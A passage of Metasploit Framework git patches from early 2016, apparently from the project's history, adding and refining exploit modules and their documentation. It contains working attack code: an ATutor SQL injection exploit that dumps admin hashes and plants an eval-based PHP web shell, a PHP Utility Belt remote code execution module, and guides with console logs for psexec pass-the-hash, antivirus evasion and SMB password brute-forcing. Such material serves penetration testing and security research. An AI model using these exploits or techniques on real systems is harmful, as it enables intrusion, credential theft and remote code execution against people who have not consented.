OptString.new('PASSWORD', [true, 'The password to authenticate with']) ],self.class) end From 727a119e5b069b8328e1afc90f4a30539bb01c6a Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 16:06:31 -0600 Subject: [PATCH 444/686] Report cred --- modules/exploits/multi/http/atutor_sqli.rb | 28 ++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index 85e0be9fd8..ec93c004d6 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -286,9 +286,37 @@ class Metasploit3 < Msf::Exploit::Remote return false end + def report_cred(opts) + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + post_reference_name: self.refname, + private_data: opts[:password], + origin_type: :service, + private_type: :password, + username: opts[:user] + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::SUCCESSFUL, + last_attempted_at: Time.now + }.merge(service_data) + + create_credential_login(login_data) + end + def exploit student_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") + report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) if test_injection(student_cookie) print_good("Test injection working!") From 54ede191504f893d1a54bc8bf385a4c887372dd0 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 16:15:50 -0600 Subject: [PATCH 445/686] Use FileDropper to cleanup --- modules/exploits/multi/http/atutor_sqli.rb | 2 ++ 1 file changed, 2 insertions(+) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index ec93c004d6..a1ba689f62 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, @@ -85,6 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote @plugin_name = Rex::Text.rand_text_alpha_lower(3) path = "#{@plugin_name}/#{@payload_name}.php" + register_file_for_cleanup("#{@payload_name}.php", "../../content/module/#{path}") zip_file.add_file(path, "<?php eval(base64_decode($_SERVER['HTTP_#{@header}'])); ?>") zip_file.pack From 638d91197ebb0bc05708553be0afc46423932d9b Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 16:18:03 -0600 Subject: [PATCH 446/686] Override print_* to always print the IP and port --- modules/exploits/multi/http/atutor_sqli.rb | 16 ++++++++++++++-- 1 file changed, 14 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index a1ba689f62..f3fc1f5216 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -51,6 +51,18 @@ class Metasploit3 < Msf::Exploit::Remote ],self.class) end + def print_status(msg='') + super("#{peer} - #{msg}") + end + + def print_error(msg='') + super("#{peer} - #{msg}") + end + + def print_good(msg='') + super("#{peer} - #{msg}") + end + def push uri = normalize_uri(target_uri.path) @@ -66,12 +78,12 @@ class Metasploit3 < Msf::Exploit::Remote }) if res.nil? - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") fail_with(Failure::Unknown, "Failed to trigger the Enter button") end if res && res.headers && res.code == 302 - print_good("#{peer} - Logged in to the file manager") + print_good("Logged in to the file manager") cookie = res.get_cookies cookie else From f55835cceb26e89a3e603b09e3af35f0ffa13dd7 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 18:39:52 -0600 Subject: [PATCH 447/686] Merge new code changes from mr_me --- modules/exploits/multi/http/atutor_sqli.rb | 70 +++++++++++++--------- 1 file changed, 43 insertions(+), 27 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index f3fc1f5216..f9b7f6fbd4 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -63,6 +63,22 @@ class Metasploit3 < Msf::Exploit::Remote super("#{peer} - #{msg}") end + def check + # the only way to test if the target is vuln + begin + test_cookie = login(datastore['USERNAME'], datastore['PASSWORD'], false) + rescue Msf::Exploit::Failed => e + vprint_error(e.message) + return Exploit::CheckCode::Unknown + end + + if test_injection(test_cookie) + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + def push uri = normalize_uri(target_uri.path) @@ -115,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote def upload_shell(cookie) post_data = Rex::MIME::Message.new post_data.add_part(create_zip_file, 'archive/zip', nil, "form-data; name=\"modulefile\"; filename=\"#{@plugin_name}.zip\"") - post_data.add_part('Install', nil, nil, "form-data; name=\"install_upload\"") + post_data.add_part("#{Rex::Text.rand_text_alpha_upper(4)}", nil, nil, "form-data; name=\"install_upload\"") data = post_data.to_s res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "mods", "_core", "modules", "install_modules.php"), @@ -145,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote end # auth failed if we land here, bail - fail_with(Failure::NoAccess, "Upload did not work") + fail_with(Failure::Unknown, "Unable to upload php code") return false end @@ -275,19 +291,19 @@ class Metasploit3 < Msf::Exploit::Remote def generate_sql_and_test(do_true=false, do_test=false, sql=nil, cookie) if do_test - if do_true - result = perform_request("1=1", cookie) - if result =~ /There are \d entries./ - return true - end - else not do_true - result = perform_request("1=2", cookie) - if not result =~ /There are \d entries./ - return true - end - end - else not do_test and sql - return get_ascii_value(sql, cookie) + if do_true + result = perform_request("1=1", cookie) + if result =~ /There are \d entries./ + return true + end + else not do_true + result = perform_request("1=2", cookie) + if not result =~ /There are \d entries./ + return true + end + end + elsif not do_test and sql + return get_ascii_value(sql, cookie) end end @@ -332,18 +348,18 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Logged in as #{datastore['USERNAME']}, sending a few test injections...") report_cred(user: datastore['USERNAME'], password: datastore['PASSWORD']) - if test_injection(student_cookie) - print_good("Test injection working!") - print_status("Dumping username and password hash...") - credz = dump_the_hash(student_cookie) - print_good("Got the #{credz[0]} hash: #{credz[1]} !") - if credz - admin_cookie = login(credz[0], credz[1], true) - print_status("Logged in as #{credz[0]}, uploading shell...") - if upload_shell(admin_cookie) - print_good("Shell upload successful!") - exec_code - end + print_status("Dumping username and password hash...") + # we got admin hash now + credz = dump_the_hash(student_cookie) + print_good("Got the #{credz[0]} hash: #{credz[1]} !") + if credz + admin_cookie = login(credz[0], credz[1], true) + print_status("Logged in as #{credz[0]}, uploading shell...") + # install a plugin + if upload_shell(admin_cookie) + print_good("Shell upload successful!") + # boom + exec_code end end end From 274b9acb75b36a82f72a6ecd46ef221c6e3af70f Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 29 Feb 2016 18:58:05 -0600 Subject: [PATCH 448/686] rm #push --- modules/exploits/multi/http/atutor_sqli.rb | 28 ---------------------- 1 file changed, 28 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index f9b7f6fbd4..b4a9a1b014 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -79,34 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote end end - def push - uri = normalize_uri(target_uri.path) - - # To push the Enter button - res = send_request_cgi({ - 'method' => 'POST', - 'uri' => uri, - 'vars_post' => { - 'frame' => '3', - 'pass' => '' # yep this should be empty - }, - 'agent' => 'Mozilla' - }) - - if res.nil? - vprint_error("Connection timed out") - fail_with(Failure::Unknown, "Failed to trigger the Enter button") - end - - if res && res.headers && res.code == 302 - print_good("Logged in to the file manager") - cookie = res.get_cookies - cookie - else - fail_with(Failure::Unknown, "#{peer} - Error entering the file manager") - end - end - def create_zip_file zip_file = Rex::Zip::Archive.new @header = Rex::Text.rand_text_alpha_upper(4) From 62a611a4728f9c0d78f6bdb9820dd5c7915449f1 Mon Sep 17 00:00:00 2001 From: Jay Turla <shipcodez@gmail.com> Date: Tue, 1 Mar 2016 09:22:25 +0800 Subject: [PATCH 449/686] Adding PHP Utility Belt Remote Code Execution --- .../multi/http/php_utility_belt_rce.rb | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 modules/exploits/multi/http/php_utility_belt_rce.rb diff --git a/modules/exploits/multi/http/php_utility_belt_rce.rb b/modules/exploits/multi/http/php_utility_belt_rce.rb new file mode 100644 index 0000000000..d2665df9fa --- /dev/null +++ b/modules/exploits/multi/http/php_utility_belt_rce.rb @@ -0,0 +1,78 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'PHP Utility Belt Remote Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in PHP utility Belt + which is a set of tools for PHP developers and should not be installed in a + production environment because this application runs arbitrary PHP code as an + intended functionality. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'WICS', # initial discovery + 'Jay Turla' # msf + ], + 'References' => + [ + [ 'EDB', '38901' ], + [ 'URL', 'https://github.com/mboynes/php-utility-belt' ] # Official Repo + ], + 'Privileged' => false, + 'Payload' => + { + 'Space' => 2000, + 'DisableNops' => true, + }, + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['PHP Utility Belt', { } ] + ], + 'DisclosureDate' => 'Aug 12 2015', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path of PHP utility belt', '/php-utility-belt/ajax.php']), + ],self.class) + end + + def check + txt = Rex::Text.rand_text_alpha(8) + res = http_send_command("echo #{txt};") + + if res && res.body =~ /#{txt}/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + end + + def http_send_command(cmd) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_post' => { + 'code' => cmd + } + }) + end + + def exploit + http_send_command("#{payload.encoded}") + end +end From cda4c6b3b311944741ea0f79887457e80a3337f0 Mon Sep 17 00:00:00 2001 From: net-ninja <steventhomasseeley@gmail.com> Date: Tue, 1 Mar 2016 09:41:17 -0600 Subject: [PATCH 450/686] Update the regex for the number of students in ATutor --- modules/exploits/multi/http/atutor_sqli.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/multi/http/atutor_sqli.rb b/modules/exploits/multi/http/atutor_sqli.rb index b4a9a1b014..b7ed10fdde 100644 --- a/modules/exploits/multi/http/atutor_sqli.rb +++ b/modules/exploits/multi/http/atutor_sqli.rb @@ -243,7 +243,7 @@ class Metasploit3 < Msf::Exploit::Remote mid = (lower + upper) / 2 sqli = "#{sql}>#{mid}" result = perform_request(sqli, cookie) - if result =~ /There are \d entries./ + if result =~ /There are \d{0,8} entries\./ lower = mid + 1 else upper = mid @@ -254,7 +254,7 @@ class Metasploit3 < Msf::Exploit::Remote else sqli = "#{sql}=#{lower}" result = perform_request(sqli, cookie) - if result =~ /There are \d entries./ + if result =~ /There are \d{0,8} entries\./ value = lower end end @@ -265,12 +265,12 @@ class Metasploit3 < Msf::Exploit::Remote if do_test if do_true result = perform_request("1=1", cookie) - if result =~ /There are \d entries./ + if result =~ /There are \d{0,8} entries\./ return true end else not do_true result = perform_request("1=2", cookie) - if not result =~ /There are \d entries./ + if not result =~ /There are \d{0,8} entries\./ return true end end From 30043bc519d5a076bb7a3b8f069035846e1d673b Mon Sep 17 00:00:00 2001 From: Brian Patterson <Brian_Patterson@rapid7.com> Date: Tue, 1 Mar 2016 11:48:55 -0600 Subject: [PATCH 451/686] Changed .all to .load in workspace.rb in order to eager load the relation and fix the 4.0 rails deprecation --- lib/msf/core/db_manager/workspace.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager/workspace.rb b/lib/msf/core/db_manager/workspace.rb index 6bc4d3c9fe..70652b3beb 100644 --- a/lib/msf/core/db_manager/workspace.rb +++ b/lib/msf/core/db_manager/workspace.rb @@ -30,7 +30,7 @@ module Msf::DBManager::Workspace def workspaces ::ActiveRecord::Base.connection_pool.with_connection { - ::Mdm::Workspace.order('updated_at asc').all + ::Mdm::Workspace.order('updated_at asc').load } end end From 552f2a148ba4f858528b21d8d3f35f0ef0cfd58a Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 15:09:30 -0600 Subject: [PATCH 452/686] Add documentation for ms08_067_netapi --- .../exploit/windows/smb/ms08_067_netapi.md | 59 +++++++++++++++++++ 1 file changed, 59 insertions(+) create mode 100644 documentation/modules/exploit/windows/smb/ms08_067_netapi.md diff --git a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md new file mode 100644 index 0000000000..196ffa9e57 --- /dev/null +++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md @@ -0,0 +1,59 @@ +ms08_067_netapi is one of the most popular remote exploits against Microsoft Windows. It is +considered a reliable exploit, and allows you to gain access as SYSTEM - the highest Windows +privilege. In modern day penetration test, this exploit would most likely be used in an internal +environment, and not so much from external due to the likelihood of a firewall. + +The check command ms08_067_netapi is also highly accurate, because it is actually testing the +vulnerable code path, not just passively. + + +## Vulnerable Application + +This exploit works against a vulnerable SMB service from one of these Windows systems: + +* Windows 2000 +* Windows XP +* Windows 2003 + +To reliability determine whether the machine is vulnerable, you will have to either examine +the system's patch level, or use a vulnerability check. + +## Verification Steps + +Please see Basic Usage under Overview. + +## Options + +Please see Required Options under Overview. + +## Scenarios + +**Failure to detect the language pack** + +On some Windows systems, ms08_067_netapi (as well as other SMB modules) might show you this +message: + + +> Windows 2003 R2 Service Pack 2 - lang:Unknown + + +This is because the targeted system does not allow itself to be enumerated without authentication. +In this case, either you can set the username and password to be able to use automatic detection, +like this: + +``` +set SMBUSER [username] +set SMBPASS [password] +``` + +Or you must manually set the target with the correct language, for example: + +``` +set target [target ID] +``` + +**Unsafe configuration of LHOST** + +Although ms08_067_netapi is reliable enough for a memory corruption exploit, it has its own +denial-of-service moments. One scenario is when the LHOST option is incorrectly configured, +which could result the SMB to crash. From 99d593e9a0003609bbbfafdc6e3274573aa8e4e1 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 15:11:29 -0600 Subject: [PATCH 453/686] missing an of --- documentation/modules/exploit/windows/smb/ms08_067_netapi.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md index 196ffa9e57..6af5b746ad 100644 --- a/documentation/modules/exploit/windows/smb/ms08_067_netapi.md +++ b/documentation/modules/exploit/windows/smb/ms08_067_netapi.md @@ -3,7 +3,7 @@ considered a reliable exploit, and allows you to gain access as SYSTEM - the hig privilege. In modern day penetration test, this exploit would most likely be used in an internal environment, and not so much from external due to the likelihood of a firewall. -The check command ms08_067_netapi is also highly accurate, because it is actually testing the +The check command of ms08_067_netapi is also highly accurate, because it is actually testing the vulnerable code path, not just passively. From f27d24fd60499a0945bddf6e7e58fc4ed56e7a9b Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 18:52:47 -0600 Subject: [PATCH 454/686] Add module documentation for psexec --- .../modules/exploit/windows/smb/psexec.md | 142 ++++++++++++++++++ lib/msf/util/document_generator/normalizer.rb | 6 +- 2 files changed, 147 insertions(+), 1 deletion(-) create mode 100644 documentation/modules/exploit/windows/smb/psexec.md diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md new file mode 100644 index 0000000000..68d37649be --- /dev/null +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -0,0 +1,142 @@ +psexec is one of the most popular exploits against Microsoft Windows. It is a great way to test +password security, and demonstrate how a stolen password could lead to a complete compromise of an +entire corporate network. + +The Metasploit Framework actually includes different module types of psexec for different +scenarios. exploit/windows/smb/psexec is the father of them all, and is used the same way +you normally would with any Metasploit exploits. + + +## Vulnerable Application + +To be able to use exploit/windows/smb/psexec, you must meet these requirements: + +1. You have a valid username/password. +2. Firewall allows SMB. +2. The remote Windows machine's network security policy allows it. If you see [one of these errors](https://github.com/rapid7/metasploit-framework/wiki/What-does-my-Rex%3A%3AProto%3A%3ASMB-Error-mean%3F), it's an indication it doesn't. + +## Verification Steps + +Please see Basic Usage under Overview. + +## Options + +By default, exploit/windows/smb/psexec can be as simple as setting the RHOST option, and ready to +go. But in reality, you will probably need to at least configure: + +**The SMBUser Option** + +A valid Windows username. + +**The SMBPass option** + +This can be either the plain text version, or the Windows hash. + +## Scenarios + +**Typical Usage** + +Password stealing is always the first thing in order to use psexec. How you will be able to do that +really depends on the situation. But one thing for sure, if psexec is possible, so should smb_login. + +The following shows the basic workflow of using both modules and gain access: + +1. use auxiliary/scanner/smb/smb_login (please refer to that module documentation to learn usage) +2. Assuming you have found a good password, use psexec like the following: + +``` +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set RHOST 192.168.1.80 +RHOST => 192.168.1.80 +msf exploit(psexec) > set SMBUser Administrator +SMBUser => Administrator +msf exploit(psexec) > set SMBPass goodpass +SMBPass => goodpass +msf exploit(psexec) > exploit + +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] 192.168.1.80:445 - Connecting to the server... +[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'... +[*] 192.168.1.80:445 - Selecting native target +[*] 192.168.1.80:445 - Uploading payload... +[*] 192.168.1.80:445 - Created \PTIhqIrQ.exe... +[+] 192.168.1.80:445 - Service started successfully... +[*] 192.168.1.80:445 - Deleting \PTIhqIrQ.exe... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1042) at 2016-03-01 16:51:56 -0600 + +meterpreter > +``` + +**Pass the Hash** + +One common penetration testing scenario with using psexec is that attackers usually begin by +breaking into a box, manage to the dump the hashes, and use some of those hashes to log into +other boxes on the network using psexec. So let's say I'm in that scenario with the following +stolen hash: + +``` +meterpreter > hashdump +Administrator:500:e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f::: +``` + +Without the need to crack the hash, I can simply copy and paste it to the SMBPass option in +psexec, and get a session: + +``` +msf > use exploit/windows/smb/psexec +msf exploit(psexec) > set SMBUser Administrator +SMBUser => Administrator +msf exploit(psexec) > set SMBPass e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f +SMBPass => e39baff0f2c5fd4e93e28745b8bf4ba6:f4974ee4a935ee160a927eafbb3f317f +msf exploit(psexec) > set RHOST 192.168.1.80 +RHOST => 192.168.1.80 +msf exploit(psexec) > exploit + +[*] Started reverse TCP handler on 192.168.1.199:4444 +[*] 192.168.1.80:445 - Connecting to the server... +[*] 192.168.1.80:445 - Authenticating to 192.168.1.80:445 as user 'Administrator'... +[*] 192.168.1.80:445 - Selecting native target +[*] 192.168.1.80:445 - Uploading payload... +[*] 192.168.1.80:445 - Created \QpxKDHyG.exe... +[+] 192.168.1.80:445 - Service started successfully... +[*] 192.168.1.80:445 - Deleting \QpxKDHyG.exe... +[*] Sending stage (957999 bytes) to 192.168.1.80 +[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1043) at 2016-03-01 17:02:46 -0600 + +meterpreter > +``` + +**Automatic Target** + +exploit/windows/smb/psexec comes with multiple targets available, and Automatic is default. What +happens under the hood is if Powershell is detected on the remote machine, it will try Powershell, +otherwise it uses the natvie upload. Each target is explained below. + +**Powershell Target** + +The Powershell target forces the psexec module to run a Powershell command with a payload embedded +in it. Since this approach does not leave anything on disk, this is a very powerful way to evade +antivirus, however, older Windows machines might not support Powershell by default. + +Ideally, you probably want to use the Automatic target setting instead of this since it will check +if Powershell is possible first. + +**Native Upload Target** + +By default, the Native target will attempt to upload the payload (executable) to SYSTEM32, and then +execute it with psexec. This approach is rather reliable, but has a high chance of getting caught +by antivirus on the target. + +**MOF Upload Target** + +The MOF target technically does not use psexec: it does not explicitly tell Windows to execute +anything. All it does is uploading two files: the payload (exe) in SYSTEM32, and a managed object +format file in SYSTEM32\wbem\mof\ directory. When Windows sees the mof file in that directory, it +automatically runs it. Once executed, the code inside the mof file basically tells Windows to +execute our payload in SYSTEM32, and we get a session. + +Although a neat trick, Metasploit's MOF library only works against Windows XP and +Windows Server 2003. And since it does write files to disk, there is also a high chance of getting +caught by antivirus on the target. + diff --git a/lib/msf/util/document_generator/normalizer.rb b/lib/msf/util/document_generator/normalizer.rb index fffea0ed53..5292304c5c 100644 --- a/lib/msf/util/document_generator/normalizer.rb +++ b/lib/msf/util/document_generator/normalizer.rb @@ -15,8 +15,12 @@ module Redcarpet def list(content, list_type) if list_type == :unordered && content.scan(/<li>/).flatten.length > 15 %Q|<p><div id=\"long_list\"><ul>#{content}<ul></div></p>| - else + elsif list_type == :unordered %Q|<ul>#{content}</ul>| + elsif list_type == :ordered + %Q|<ol>#{content}</ol>| + else + content end end From 876a5b55f9dc0de263d863635ecb90424a93afb3 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 19:06:40 -0600 Subject: [PATCH 455/686] Update psexec.md --- documentation/modules/exploit/windows/smb/psexec.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 68d37649be..37f53f53ed 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -116,17 +116,17 @@ otherwise it uses the natvie upload. Each target is explained below. **Powershell Target** The Powershell target forces the psexec module to run a Powershell command with a payload embedded -in it. Since this approach does not leave anything on disk, this is a very powerful way to evade -antivirus, however, older Windows machines might not support Powershell by default. +in it. Since this approach does not leave anything on disk, it is a very powerful way to evade +antivirus. However, older Windows machines might not support Powershell by default. Ideally, you probably want to use the Automatic target setting instead of this since it will check if Powershell is possible first. **Native Upload Target** -By default, the Native target will attempt to upload the payload (executable) to SYSTEM32, and then -execute it with psexec. This approach is rather reliable, but has a high chance of getting caught -by antivirus on the target. +By default, the Native target will attempt to upload the payload (executable) to SYSTEM32 +(modifiable with the SHARE datastore option) , and then execute it with psexec. This approach is +rather reliable, but has a high chance of getting caught by antivirus on the target. **MOF Upload Target** From d4c433e29f2e87d21301d5135d0a539b78f4d11e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 19:29:25 -0600 Subject: [PATCH 456/686] Update psexec.md --- documentation/modules/exploit/windows/smb/psexec.md | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/windows/smb/psexec.md b/documentation/modules/exploit/windows/smb/psexec.md index 37f53f53ed..7502114d88 100644 --- a/documentation/modules/exploit/windows/smb/psexec.md +++ b/documentation/modules/exploit/windows/smb/psexec.md @@ -125,8 +125,11 @@ if Powershell is possible first. **Native Upload Target** By default, the Native target will attempt to upload the payload (executable) to SYSTEM32 -(modifiable with the SHARE datastore option) , and then execute it with psexec. This approach is -rather reliable, but has a high chance of getting caught by antivirus on the target. +(modifiable with the SHARE datastore option) , and then execute it with psexec. + +This approach is rather reliable, but has a high chance of getting caught by antivirus on the +target. To counter this, you can try to use a template by setting the EXE::Path and EXE::Template +datastore options. Or, you can supply your own custom EXE by setting the EXE::Custom option. **MOF Upload Target** @@ -140,3 +143,7 @@ Although a neat trick, Metasploit's MOF library only works against Windows XP an Windows Server 2003. And since it does write files to disk, there is also a high chance of getting caught by antivirus on the target. +The way to counter antivirus is still the same. You can either use a different template by setting +the EXE::Path and EXE::Template datastore options. Or you can supply your own custom EXE by setting +the EXE::Custom option. + From c8e1396cb45b52fc2f48a075b6cdcc227d94a47b Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 22:03:16 -0600 Subject: [PATCH 457/686] Add documentation for smb_login --- .../auxiliary/scanner/smb/smb_login.md | 119 ++++++++++++++++++ 1 file changed, 119 insertions(+) create mode 100644 documentation/modules/auxiliary/scanner/smb/smb_login.md diff --git a/documentation/modules/auxiliary/scanner/smb/smb_login.md b/documentation/modules/auxiliary/scanner/smb/smb_login.md new file mode 100644 index 0000000000..41647069f7 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/smb/smb_login.md @@ -0,0 +1,119 @@ +The smb_login module is used to brute-force SMB remotely. SMB credentials are extra valuable for +you as an attacker, because they are system credentials, and you can probably reuse some of them +and log into more machines. + +## Vulnerable Application + +To use smb_login, make sure you are able to connect to a SMB service. + +## Verification Steps + +The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB: + +``` +msf > use auxiliary/scanner/smb/smb_login +msf auxiliary(smb_login) > set RHOSTS 192.168.1.80 +RHOSTS => 192.168.1.80 +msf auxiliary(smb_login) > set USER_FILE /Users/wchen/rapid7/msf/data/wordlists/unix_users.txt +USER_FILE => /Users/wchen/rapid7/msf/data/wordlists/unix_users.txt +msf auxiliary(smb_login) > set PASS_FILE /Users/wchen/rapid7/msf/data/wordlists/unix_passwords.txt +PASS_FILE => /Users/wchen/rapid7/msf/data/wordlists/unix_passwords.txt +msf auxiliary(smb_login) > run + +[+] 192.168.1.80:445 - 192.168.1.80:445 SMB - Success: '.\root:monkey' Administrator +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(smb_login) > +``` + +If you have a database connected, you should also see this credential logged: + +``` +msf auxiliary(smb_login) > creds +Credentials +=========== + +host origin service public private realm private_type +---- ------ ------- ------ ------- ----- ------------ +192.168.1.80 192.168.1.80 445/tcp (smb) root monkey Password + +msf auxiliary(smb_login) +``` + +## Options + +By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will +also need to supply user names and passwords. The following options are available to support +different credential formats: + +**The USER_FILE option** + +If you happen to manage all the found user names in a separate file, then this option would be +suitable for that. One per line. + +An example of setting USER_FILE: + +``` +set USER_FILE [path to file] +``` + +**The PASS_FILE option** + +If you happen to manage all the found passwords in a separate file, then this option would be +suitable for that. One per line. + +``` +set PASS_FILE [path to file] +``` + +**The USERPASS_FILE option** + +If each user should be using a specific password in your file, then you can use this option. One +username/password per line: + +``` +set USERPASS_FILE [path to file] +``` + +**The DB_ALL_CREDS option** + +This option allows you to reuse all the user names and passwords collected by the database: + +``` +set DB_ALL_CREDS true +``` + +**The DB_ALL_PASS option** + +This option allows you to reuse all the passwords collected by the database. + +``` +set DB_ALL_PASS true +``` + +**The DB_ALL_USERS option** + +This option allows you to reuse all the user names collected by the database. + +``` +set DB_ALL_USERS true +``` + +**The SMBUser option** + +If you are testing a specific user, use this option. + +``` +set SMBUser [user name] +``` + +**The SMBPass option** + +If you are testing a specific password, use this option. + +``` +set SMBPass [password] +``` + +Note: If an account has been successfully brute-forced, that account will not be tried again. + From a798581fa3a209c9464edcff056b34a226fb03ac Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 1 Mar 2016 22:25:40 -0600 Subject: [PATCH 458/686] Update #get_dotnet_path --- modules/exploits/windows/local/applocker_bypass.rb | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/applocker_bypass.rb b/modules/exploits/windows/local/applocker_bypass.rb index ab95094ff1..c48aa4d1ad 100644 --- a/modules/exploits/windows/local/applocker_bypass.rb +++ b/modules/exploits/windows/local/applocker_bypass.rb @@ -88,10 +88,17 @@ class Metasploit4 < Msf::Exploit::Local def get_dotnet_path(windir) base_path = "#{windir}\\Microsoft.NET\\Framework#{payload.arch.first == 'x86' ? '' : '64'}" paths = dir(base_path).select {|p| p[0] == 'v'} - version = paths.last - dotnet_path = "#{base_path}\\#{version}" + dotnet_path = nil - unless dotnet_path && directory?(dotnet_path) + paths.reverse.each do |p| + path = "#{base_path}\\#{p}" + if directory?(path) && file?("#{path}\\InstallUtil.exe") + dotnet_path = path + break + end + end + + unless dotnet_path fail_with(Failure::NotVulnerable, '.NET is not present on the target.') end From 538ee1ec36d512f1c60069b1024ea40fa40f2b0f Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Tue, 1 Mar 2016 10:54:49 -0600 Subject: [PATCH 459/686] Print a helpful message on LoadError --- tools/modules/file_pull_requests.rb | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/tools/modules/file_pull_requests.rb b/tools/modules/file_pull_requests.rb index 144078fbe5..5932c71240 100755 --- a/tools/modules/file_pull_requests.rb +++ b/tools/modules/file_pull_requests.rb @@ -9,11 